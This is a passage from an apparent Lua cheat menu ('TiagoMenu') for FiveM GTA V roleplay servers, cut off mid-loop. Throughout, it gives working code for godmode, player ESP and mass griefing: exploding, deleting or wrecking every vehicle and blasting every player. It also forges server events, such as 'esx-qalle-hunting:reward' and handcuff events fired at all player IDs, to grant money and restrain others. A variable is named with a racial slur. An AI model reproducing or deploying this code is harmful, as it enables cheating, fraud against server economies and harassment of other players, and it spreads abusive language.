  4961. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2) - 1, false)
  4962. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3) - 1, false)
  4963. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4) - 1, false)
  4964. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5) - 1, false)
  4965. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6) - 1, false)
  4966. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7) - 1, false)
  4967. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8) - 1, false)
  4968. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9) - 1, false)
  4969. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10) - 1, false)
  4970. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1, false)
  4971. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1, false)
  4972. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1, false)
  4973. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 14, 16, false)
  4974. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2, false)
  4975. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1, false)
  4976. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
  4977. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
  4978. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
  4979. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 20, true)
  4980. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
  4981. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 22, true)
  4982. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 23, 1, false)
  4983. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 24, 1, false)
  4984. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25) - 1, false)
  4985. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27) - 1, false)
  4986. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28) - 1, false)
  4987. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30) - 1, false)
  4988. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33) - 1, false)
  4989. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34) - 1, false)
  4990. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35) - 1, false)
  4991. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38) - 1, true)
  4992. SetVehicleWindowTint(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1)
  4993. SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  4994. SetVehicleNumberPlateTextIndex(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5)
  4995. end
  4997. function DelVeh(veh)
  4998. SetEntityAsMissionEntity(Object, 1, 1)
  4999. DeleteEntity(Object)
  5000. SetEntityAsMissionEntity(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, 1)
  5001. DeleteEntity(GetVehiclePedIsIn(GetPlayerPed(-1), false))
  5002. end
  5004. function Clean(veh)
  5005. SetVehicleDirtLevel(veh, 15.0)
  5006. end
  5008. function Clean2(veh)
  5009. SetVehicleDirtLevel(veh, 1.0)
  5010. end
  5013. entityEnumerator = {
  5014. __gc = function(enum)
  5015. if enum.destructor and enum.handle then
  5016. enum.destructor(enum.handle)
  5017. end
  5018. enum.destructor = nil
  5019. enum.handle = nil
  5020. end
  5021. }
  5023. function EnumerateEntities(initFunc, moveFunc, disposeFunc)
  5024. return coroutine.wrap(function()
  5025. local iter, id = initFunc()
  5026. if not id or id == 0 then
  5027. disposeFunc(iter)
  5028. return
  5029. end
  5031. local enum = {handle = iter, destructor = disposeFunc}
  5032. setmetatable(enum, entityEnumerator)
  5034. local next = true
  5035. repeat
  5036. coroutine.yield(id)
  5037. next, id = moveFunc(iter)
  5038. until not next
  5040. enum.destructor, enum.handle = nil, nil
  5041. disposeFunc(iter)
  5042. end)
  5043. end
  5045. function EnumerateObjects()
  5046. return EnumerateEntities(FindFirstObject, FindNextObject, EndFindObject)
  5047. end
  5049. function EnumeratePeds()
  5050. return EnumerateEntities(FindFirstPed, FindNextPed, EndFindPed)
  5051. end
  5053. function EnumerateVehicles()
  5054. return EnumerateEntities(FindFirstVehicle, FindNextVehicle, EndFindVehicle)
  5055. end
  5057. function EnumeratePickups()
  5058. return EnumerateEntities(FindFirstPickup, FindNextPickup, EndFindPickup)
  5059. end
  5061. function RequestControl(entity)
  5062. local Waiting = 0
  5063. NetworkRequestControlOfEntity(entity)
  5064. while not NetworkHasControlOfEntity(entity) do
  5065. Waiting = Waiting + 100
  5066. Citizen.Wait(100)
  5067. if Waiting > 5000 then
  5068. drawNotification("Hung for 5 seconds, killing to prevent issues...")
  5069. end
  5070. end
  5071. end
  5073. function getEntity(player)
  5074. local result, entity = GetEntityPlayerIsFreeAimingAt(player, Citizen.ReturnResultAnyway())
  5075. return entity
  5076. end
  5078. function GetInputMode()
  5079. return Citizen.InvokeNative(0xA571D46727E2B718, 2) and "MouseAndKeyboard" or "GamePad"
  5080. end
  5082. function DrawSpecialText(m_text, showtime)
  5083. SetTextEntry_2("STRING")
  5084. AddTextComponentString(m_text)
  5085. DrawSubtitleTimed(showtime, 1)
  5086. end
  5089. local playerBlips = true
  5091. ShowHudComponentThisFrame(14)
  5093. Citizen.CreateThread(function()
  5094. local headId = {}
  5095. while true do
  5096. Citizen.Wait(1)
  5097. if playerBlips then
  5099. for id = 0, 128 do
  5100. if NetworkIsPlayerActive(id) and GetPlayerPed(id) ~= GetPlayerPed(-1) then
  5101. ped = GetPlayerPed(id)
  5102. blip = GetBlipFromEntity(ped)
  5106. headId[id] = CreateMpGamerTag(ped, GetPlayerName( id ), false, false, "", false)
  5107. wantedLvl = GetPlayerWantedLevel(id)
  5110. if wantedLvl then
  5111. SetMpGamerTagVisibility(headId[id], 7, true)
  5112. SetMpGamerTagWantedLevel(headId[id], wantedLvl)
  5113. else
  5114. SetMpGamerTagVisibility(headId[id], 7, false)
  5115. end
  5118. if NetworkIsPlayerTalking(id) then
  5119. SetMpGamerTagVisibility(headId[id], 9, true)
  5120. else
  5121. SetMpGamerTagVisibility(headId[id], 9, false)
  5122. end
  5126. if not DoesBlipExist(blip) then
  5127. blip = AddBlipForEntity(ped)
  5128. SetBlipSprite(blip, 1)
  5129. ShowHeadingIndicatorOnBlip(blip, true)
  5130. else
  5131. veh = GetVehiclePedIsIn(ped, false)
  5132. blipSprite = GetBlipSprite(blip)
  5133. if not GetEntityHealth(ped) then
  5134. if blipSprite ~= 274 then
  5135. SetBlipSprite(blip, 274)
  5136. ShowHeadingIndicatorOnBlip(blip, false)
  5137. end
  5138. elseif veh then
  5139. vehClass = GetVehicleClass(veh)
  5140. vehModel = GetEntityModel(veh)
  5141. if vehClass == 15 then
  5142. if blipSprite ~= 422 then
  5143. SetBlipSprite(blip, 422)
  5144. ShowHeadingIndicatorOnBlip(blip, false)
  5145. end
  5146. elseif vehClass == 8 then
  5147. if blipSprite ~= 226 then
  5148. SetBlipSprite(blip, 226)
  5149. ShowHeadingIndicatorOnBlip(blip, false)
  5150. end
  5151. elseif vehClass == 16 then
  5152. if vehModel == GetHashKey("besra") or vehModel == GetHashKey("hydra") or vehModel == GetHashKey("lazer") then
  5153. if blipSprite ~= 424 then
  5154. SetBlipSprite(blip, 424)
  5155. ShowHeadingIndicatorOnBlip(blip, false)
  5156. end
  5157. elseif blipSprite ~= 423 then
  5158. SetBlipSprite(blip, 423)
  5159. ShowHeadingIndicatorOnBlip(blip, false)
  5160. end
  5161. elseif vehClass == 14 then
  5162. if blipSprite ~= 427 then
  5163. SetBlipSprite(blip, 427)
  5164. ShowHeadingIndicatorOnBlip(blip, false)
  5165. end
  5166. elseif vehModel == GetHashKey("insurgent") or vehModel == GetHashKey("insurgent2") or vehModel == GetHashKey("insurgent3") then
  5167. if blipSprite ~= 426 then
  5168. SetBlipSprite(blip, 426)
  5169. ShowHeadingIndicatorOnBlip(blip, false)
  5170. end
  5171. elseif vehModel == GetHashKey("limo2") then
  5172. if blipSprite ~= 460 then
  5173. SetBlipSprite(blip, 460)
  5174. ShowHeadingIndicatorOnBlip(blip, false)
  5175. end
  5176. elseif vehModel == GetHashKey("rhino") then
  5177. if blipSprite ~= 421 then
  5178. SetBlipSprite(blip, 421)
  5179. ShowHeadingIndicatorOnBlip(blip, false)
  5180. end
  5181. elseif vehModel == GetHashKey("trash") or vehModel == GetHashKey("trash2") then
  5182. if blipSprite ~= 318 then
  5183. SetBlipSprite(blip, 318)
  5184. ShowHeadingIndicatorOnBlip(blip, false)
  5185. end
  5186. elseif vehModel == GetHashKey("pbus") then
  5187. if blipSprite ~= 513 then
  5188. SetBlipSprite(blip, 513)
  5189. ShowHeadingIndicatorOnBlip(blip, false)
  5190. end
  5191. elseif vehModel == GetHashKey("seashark") or vehModel == GetHashKey("seashark2") or vehModel == GetHashKey("seashark3") then
  5192. if blipSprite ~= 471 then
  5193. SetBlipSprite(blip, 471)
  5194. ShowHeadingIndicatorOnBlip(blip, false)
  5195. end
  5196. elseif vehModel == GetHashKey("cargobob") or vehModel == GetHashKey("cargobob2") or vehModel == GetHashKey("cargobob3") or vehModel == GetHashKey("cargobob4") then -- Cargobobs
  5197. if blipSprite ~= 481 then
  5198. SetBlipSprite(blip, 481)
  5199. ShowHeadingIndicatorOnBlip(blip, false)
  5200. end
  5201. elseif vehModel == GetHashKey("technical") or vehModel == GetHashKey("technical2") or vehModel == GetHashKey("technical3") then -- Technical
  5202. if blipSprite ~= 426 then
  5203. SetBlipSprite(blip, 426)
  5204. ShowHeadingIndicatorOnBlip(blip, false)
  5205. end
  5206. elseif vehModel == GetHashKey("taxi") then
  5207. if blipSprite ~= 198 then
  5208. SetBlipSprite(blip, 198)
  5209. ShowHeadingIndicatorOnBlip(blip, false)
  5210. end
  5211. elseif vehModel == GetHashKey("fbi") or vehModel == GetHashKey("fbi2") or vehModel == GetHashKey("police2") or vehModel == GetHashKey("police3") -- Police Vehicles
  5212. or vehModel == GetHashKey("police") or vehModel == GetHashKey("sheriff2") or vehModel == GetHashKey("sheriff")
  5213. or vehModel == GetHashKey("policeold2") or vehModel == GetHashKey("policeold1") then
  5214. if blipSprite ~= 56 then
  5215. SetBlipSprite(blip, 56)
  5216. ShowHeadingIndicatorOnBlip(blip, false)
  5217. end
  5218. elseif blipSprite ~= 1 then
  5219. SetBlipSprite(blip, 1)
  5220. ShowHeadingIndicatorOnBlip(blip, true)
  5221. end
  5224. passengers = GetVehicleNumberOfPassengers(veh)
  5226. if passengers then
  5227. if not IsVehicleSeatFree(veh, -1) then
  5228. passengers = passengers + 1
  5229. end
  5230. ShowNumberOnBlip(blip, passengers)
  5231. else
  5232. HideNumberOnBlip(blip)
  5233. end
  5234. else
  5236. HideNumberOnBlip(blip)
  5237. if blipSprite ~= 1 then
  5238. SetBlipSprite(blip, 1)
  5239. ShowHeadingIndicatorOnBlip(blip, true)
  5240. end
  5241. end
  5243. SetBlipRotation(blip, math.ceil(GetEntityHeading(veh)))
  5244. SetBlipNameToPlayerName(blip, id)
  5245. SetBlipScale(blip, 0.85)
  5248. if IsPauseMenuActive() then
  5249. SetBlipAlpha( blip, 255 )
  5250. else
  5251. x1, y1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
  5252. x2, y2 = table.unpack(GetEntityCoords(GetPlayerPed(id), true))
  5253. distance = (math.floor(math.abs(math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2))) / -1)) + 900
  5256. if distance < 0 then
  5257. distance = 0
  5258. elseif distance > 255 then
  5259. distance = 255
  5260. end
  5261. SetBlipAlpha(blip, distance)
  5262. end
  5263. end
  5264. end
  5265. end
  5266. else
  5267. for id = 0, 128 do
  5268. ped = GetPlayerPed(id)
  5269. blip = GetBlipFromEntity(ped)
  5270. if DoesBlipExist(blip) then
  5271. RemoveBlip(blip)
  5272. end
  5273. if IsMpGamerTagActive(headId[id]) then
  5274. RemoveMpGamerTag(headId[id])
  5275. end
  5276. end
  5277. end
  5278. end
  5279. end)
  5281. Citizen.CreateThread(
  5282. function()
  5283. while Enabled do
  5284. Citizen.Wait(0)
  5285. SetPlayerInvincible(PlayerId(), Godmode)
  5286. SetEntityInvincible(PlayerPedId(), Godmode)
  5287. if SuperJump then
  5288. SetSuperJumpThisFrame(PlayerId())
  5289. end
  5291. if ePunch then
  5292. SetExplosiveMeleeThisFrame(PlayerId())
  5293. end
  5295. if InfStamina then
  5296. RestorePlayerStamina(PlayerId(), 1.0)
  5297. end
  5299. if Invisible then
  5300. SetEntityVisible(GetPlayerPed(-1), false, 0)
  5301. else
  5302. SetEntityVisible(GetPlayerPed(-1), true, 0)
  5304. if fastrun then
  5305. SetRunSprintMultiplierForPlayer(PlayerId(), 2.49)
  5306. SetPedMoveRateOverride(GetPlayerPed(-1), 2.15)
  5307. else
  5308. SetRunSprintMultiplierForPlayer(PlayerId(), 1.0)
  5309. SetPedMoveRateOverride(GetPlayerPed(-1), 1.0)
  5310. end
  5311. end
  5312. local function ToggleGodmode(tog)
  5313. local ped = PlayerPedId()
  5314. SetEntityProofs(ped, tog, tog, tog, tog, tog)
  5315. SetPedCanRagdoll(PlayerPedId(), not tog)
  5316. end
  5318. if Demigod then
  5319. if GetEntityHealth(PlayerPedId()) < 200 then
  5320. SetEntityHealth(PlayerPedId(), 200)
  5321. end
  5322. end
  5325. if Forcefield then
  5326. ForcefieldPlayer(PlayerId(), ForcefieldRadius)
  5327. end
  5328. if VehicleGun then
  5329. local VehicleGunVehicle = "Freight"
  5330. local playerPedPos = GetEntityCoords(GetPlayerPed(-1), true)
  5331. if (IsPedInAnyVehicle(GetPlayerPed(-1), true) == false) then
  5332. drawNotification("~g~Vehicle Gun Enabled!~n~~w~Use The ~b~AP Pistol~n~~b~Aim ~w~and ~b~Shoot!")
  5333. GiveWeaponToPed(GetPlayerPed(-1), GetHashKey("WEAPON_APPISTOL"), 999999, false, true)
  5334. SetPedAmmo(GetPlayerPed(-1), GetHashKey("WEAPON_APPISTOL"), 999999)
  5335. if (GetSelectedPedWeapon(GetPlayerPed(-1)) == GetHashKey("WEAPON_APPISTOL")) then
  5336. if IsPedShooting(GetPlayerPed(-1)) then
  5337. while not HasModelLoaded(GetHashKey(VehicleGunVehicle)) do
  5338. Citizen.Wait(0)
  5339. RequestModel(GetHashKey(VehicleGunVehicle))
  5340. end
  5341. local veh = CreateVehicle(GetHashKey(VehicleGunVehicle), playerPedPos.x + (5 * GetEntityForwardX(GetPlayerPed(-1))), playerPedPos.y + (5 * GetEntityForwardY(GetPlayerPed(-1))), playerPedPos.z + 2.0, GetEntityHeading(GetPlayerPed(-1)), true, true)
  5342. SetEntityAsNoLongerNeeded(veh)
  5343. SetVehicleForwardSpeed(veh, 150.0)
  5344. end
  5345. end
  5346. end
  5347. end
  5349. if DeleteGun then
  5350. local gotEntity = getEntity(PlayerId())
  5351. if (IsPedInAnyVehicle(GetPlayerPed(-1), true) == false) then
  5352. drawNotification("~g~Delete Gun Enabled!~n~~w~Use The ~b~Pistol~n~~b~Aim ~w~and ~b~Shoot ~w~To Delete!")
  5353. GiveWeaponToPed(GetPlayerPed(-1), GetHashKey("WEAPON_PISTOL"), 999999, false, true)
  5354. SetPedAmmo(GetPlayerPed(-1), GetHashKey("WEAPON_PISTOL"), 999999)
  5355. if (GetSelectedPedWeapon(GetPlayerPed(-1)) == GetHashKey("WEAPON_PISTOL")) then
  5356. if IsPlayerFreeAiming(PlayerId()) then
  5357. if IsEntityAPed(gotEntity) then
  5358. if IsPedInAnyVehicle(gotEntity, true) then
  5359. if IsControlJustReleased(1, 142) then
  5360. SetEntityAsMissionEntity(GetVehiclePedIsIn(gotEntity, true), 1, 1)
  5361. DeleteEntity(GetVehiclePedIsIn(gotEntity, true))
  5362. SetEntityAsMissionEntity(gotEntity, 1, 1)
  5363. DeleteEntity(gotEntity)
  5364. drawNotification("~g~Deleted!")
  5365. end
  5366. else
  5367. if IsControlJustReleased(1, 142) then
  5368. SetEntityAsMissionEntity(gotEntity, 1, 1)
  5369. DeleteEntity(gotEntity)
  5370. drawNotification("~g~Deleted!")
  5371. end
  5372. end
  5373. else
  5374. if IsControlJustReleased(1, 142) then
  5375. SetEntityAsMissionEntity(gotEntity, 1, 1)
  5376. DeleteEntity(gotEntity)
  5377. drawNotification("~g~Deleted!")
  5378. end
  5379. end
  5380. end
  5381. end
  5382. end
  5383. end
  5388. if fuckallcars then
  5389. for aP in EnumerateVehicles() do
  5390. if not
  5391. IsPedAPlayer(GetPedInVehicleSeat(aP, -1)) then SetVehicleHasBeenOwnedByPlayer(aP, false) SetEntityAsMissionEntity(aP, false, false) StartVehicleAlarm(aP) DetachVehicleWindscreen(aP) SmashVehicleWindow(aP, 0) SmashVehicleWindow(aP, 1) SmashVehicleWindow(aP, 2) SmashVehicleWindow(aP, 3) SetVehicleTyreBurst(aP, 0, true, 1000.0) SetVehicleTyreBurst(aP, 1, true, 1000.0) SetVehicleTyreBurst(aP, 2, true, 1000.0) SetVehicleTyreBurst(aP, 3, true, 1000.0) SetVehicleTyreBurst(aP, 4, true, 1000.0) SetVehicleTyreBurst(aP, 5, true, 1000.0) SetVehicleTyreBurst(aP, 4, true, 1000.0) SetVehicleTyreBurst(aP, 7, true, 1000.0) SetVehicleDoorBroken(aP, 0, true) SetVehicleDoorBroken(aP, 1, true) SetVehicleDoorBroken(aP, 2, true) SetVehicleDoorBroken(aP, 3, true) SetVehicleDoorBroken(aP, 4, true) SetVehicleDoorBroken(aP, 5, true) SetVehicleDoorBroken(aP, 6, true) SetVehicleDoorBroken(aP, 7, true) SetVehicleLights(aP, 1) Citizen.InvokeNative(0x1FD09E7390A74D54, aP, 1) SetVehicleNumberPlateTextIndex(aP, 5) SetVehicleNumberPlateText(aP, "TiagoMenu") SetVehicleDirtLevel(aP, 10.0) SetVehicleModColor_1(aP, 1) SetVehicleModColor_2(aP, 1) SetVehicleCustomPrimaryColour(aP, 255, 51, 255) SetVehicleCustomSecondaryColour(aP, 255, 51, 255) SetVehicleBurnout(aP, true) end end end
  5392. if destroyvehicles then
  5393. for vehicle in EnumerateVehicles() do
  5394. if vehicle ~=
  5395. GetVehiclePedIsIn(GetPlayerPed(-1), false) then NetworkRequestControlOfEntity(vehicle) SetVehicleUndriveable(vehicle, true) SetVehicleEngineHealth(vehicle, 0) end end end
  5396. if alarmvehicles then
  5397. for vehicle in EnumerateVehicles() do
  5398. if vehicle ~=
  5399. GetVehiclePedIsIn(GetPlayerPed(-1), false) then NetworkRequestControlOfEntity(vehicle) SetVehicleAlarm(vehicle, true) StartVehicleAlarm(vehicle) end end end
  5400. if explodevehicles then
  5401. for vehicle in EnumerateVehicles() do
  5402. if vehicle ~=
  5403. GetVehiclePedIsIn(GetPlayerPed(-1), false) then NetworkRequestControlOfEntity(vehicle) NetworkExplodeVehicle(vehicle, true, true, false) end end end
  5404. if huntspam then Citizen.Wait(1) TriggerServerEvent('esx-qalle-hunting:reward', 20000) TriggerServerEvent('esx-qalle-hunting:sell') end
  5405. if deletenearestvehicle then
  5406. for vehicle in EnumerateVehicles() do
  5407. if vehicle ~=
  5408. GetVehiclePedIsIn(GetPlayerPed(-1), false) then SetEntityAsMissionEntity(GetVehiclePedIsIn(vehicle, true), 1, 1) DeleteEntity(GetVehiclePedIsIn(vehicle, true)) SetEntityAsMissionEntity(vehicle, 1, 1) DeleteEntity(vehicle) end end end
  5410. if freezeall then
  5411. for i = 0, 128 do
  5412. TriggerServerEvent("OG_cuffs:cuffCheckNearest", GetPlayerServerId(i))
  5413. TriggerServerEvent("CheckHandcuff", GetPlayerServerId(i))
  5414. TriggerServerEvent('cuffServer', GetPlayerServerId(i))
  5415. TriggerServerEvent("cuffGranted", GetPlayerServerId(i))
  5416. TriggerServerEvent("police:cuffGranted", GetPlayerServerId(i))
  5417. TriggerServerEvent('esx_handcuffs:cuffing', GetPlayerServerId(i))
  5418. TriggerServerEvent('esx_policejob:handcuff', GetPlayerServerId(i))
  5419. end
  5420. end
  5422. if explodevehicles then
  5423. for vehicle in EnumerateVehicles() do
  5424. if (vehicle ~= GetVehiclePedIsIn(GetPlayerPed(-1), false)) and (not GotTrailer or (GotTrailer and vehicle ~= TrailerHandle)) then
  5425. NetworkRequestControlOfEntity(vehicle)
  5426. NetworkExplodeVehicle(vehicle, true, true, false)
  5427. end
  5428. end
  5429. end
  5431. if crosshair then
  5432. ShowHudComponentThisFrame(14)
  5433. end
  5435. if crosshair2 then
  5436. ch("~r~+",0.495,0.484)
  5437. end
  5439. if crosshair3 then
  5440. ch("~r~.",0.4968,0.478)
  5441. end
  5443. if CLEAR then
  5444. SetWeatherTypePersist("CLEAR")
  5445. SetWeatherTypeNowPersist("CLEAR")
  5446. SetWeatherTypeNow("CLEAR")
  5447. SetOverrideWeather("CLEAR")
  5448. end
  5450. if BLIZZARD then
  5451. SetWeatherTypePersist("BLIZZARD")
  5452. SetWeatherTypeNowPersist("BLIZZARD")
  5453. SetWeatherTypeNow("BLIZZARD")
  5454. SetOverrideWeather("BLIZZARD")
  5455. end
  5457. if FOGGY then
  5458. SetWeatherTypePersist("FOGGY")
  5459. SetWeatherTypeNowPersist("FOGGY")
  5460. SetWeatherTypeNow("FOGGY")
  5461. SetOverrideWeather("FOGGY")
  5462. end
  5464. if EXTRASUNNY then
  5465. SetWeatherTypePersist("EXTRASUNNY")
  5466. SetWeatherTypeNowPersist("EXTRASUNNY")
  5467. SetWeatherTypeNow("EXTRASUNNY")
  5468. SetOverrideWeather("EXTRASUNNY")
  5469. end
  5471. if XMAS then
  5472. SetForceVehicleTrails(true)
  5473. SetForcePedFootstepsTracks(true)
  5474. SetWeatherTypePersist("XMAS")
  5475. SetWeatherTypeNowPersist("XMAS")
  5476. SetWeatherTypeNow("XMAS")
  5477. SetOverrideWeather("XMAS")
  5478. end
  5484. if esp then
  5485. for i = 0, 128 do
  5486. if i ~= PlayerId() and GetPlayerServerId(i) ~= 0 then
  5487. local ra = RGBRainbow(1.0)
  5488. local pPed = GetPlayerPed(i)
  5489. local cx, cy, cz = table.unpack(GetEntityCoords(PlayerPedId()))
  5490. local x, y, z = table.unpack(GetEntityCoords(pPed))
  5491. local message =
  5492. "~h~ID: " ..GetPlayerServerId(i) .." ~r~~h~ "..GetPlayerName(i) .."\n~h~~b~ Dist: " .. math.round(GetDistanceBetweenCoords(cx, cy, cz, x, y, z, false), 1)
  5494. DrawText3D(x, y, z + 1.0, message, 255, 255, 255)
  5496. LineOneBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, -0.9)
  5497. LineOneEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, -0.9)
  5498. LineTwoBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, -0.9)
  5499. LineTwoEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, -0.9)
  5500. LineThreeBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, -0.9)
  5501. LineThreeEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, -0.9)
  5502. LineFourBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, -0.9)
  5504. TLineOneBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, 0.8)
  5505. TLineOneEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, 0.8)
  5506. TLineTwoBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, 0.8)
  5507. TLineTwoEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, 0.8)
  5508. TLineThreeBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, 0.8)
  5509. TLineThreeEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, 0.8)
  5510. TLineFourBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, 0.8)
  5512. ConnectorOneBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, 0.8)
  5513. ConnectorOneEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, -0.9)
  5514. ConnectorTwoBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, 0.8)
  5515. ConnectorTwoEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, -0.9)
  5516. ConnectorThreeBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, 0.8)
  5517. ConnectorThreeEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, -0.9)
  5518. ConnectorFourBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, 0.8)
  5519. ConnectorFourEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, -0.9)
  5520. end
  5521. end
  5522. end
  5524. local niggerVehicle = GetVehiclePedIsIn(PlayerPedId(), false)
  5527. if IsPedInAnyVehicle(PlayerPedId()) then
  5528. if driftMode then
  5529. SetVehicleGravityAmount(niggerVehicle, 5.0)
  5530. elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
  5531. SetVehicleGravityAmount(niggerVehicle, 10.0)
  5532. end
  5535. if superGrip then
  5536. SetVehicleGravityAmount(niggerVehicle, 20.0)
  5537. elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
  5538. SetVehicleGravityAmount(niggerVehicle, 10.0)
  5539. end
  5541. if enchancedGrip then
  5542. SetVehicleGravityAmount(niggerVehicle, 12.0)
  5543. elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
  5544. SetVehicleGravityAmount(niggerVehicle, 10.0)
  5545. end
  5547. if fdMode then
  5548. SetVehicleGravityAmount(niggerVehicle, 5.5)
  5549. SetVehicleEngineTorqueMultiplier(niggerVehicle, 4.0)
  5550. elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
  5551. SetVehicleGravityAmount(niggerVehicle, 10.0)
  5552. SetVehicleEngineTorqueMultiplier(niggerVehicle, 1.0)
  5553. end
  5555. if t2x then
  5556. SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),2.0)
  5557. end
  5559. if t4x then
  5560. SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),4.0)
  5561. end
  5563. if t8x then
  5564. SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),8.0)
  5565. end
  5567. if t16x then
  5568. SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),16.0)
  5569. end
  5570. end
  5573. if supergrip then
  5574. SetHandlingInt(GetVehiclePedIsUsing(PlayerPedId()), CHandlingData, fTractionCurveMin, 1000000)
  5575. end
  5577. if VehGod and IsPedInAnyVehicle(PlayerPedId(), true) then
  5578. SetEntityInvincible(GetVehiclePedIsUsing(PlayerPedId()), true)
  5579. end
  5581. if blowall then
  5582. for i = 0, 128 do
  5583. AddExplosion(GetEntityCoords(GetPlayerPed(i)), 2, 100000.0, true, false, 100000.0)
  5584. end
  5585. end
  5587. if freezePlayer then
  5588. ClearPedTasksImmediately(GetPlayerPed(SelectedPlayer))
  5589. end
  5591. if banallusers then
  5592. for i = 0, 128 do
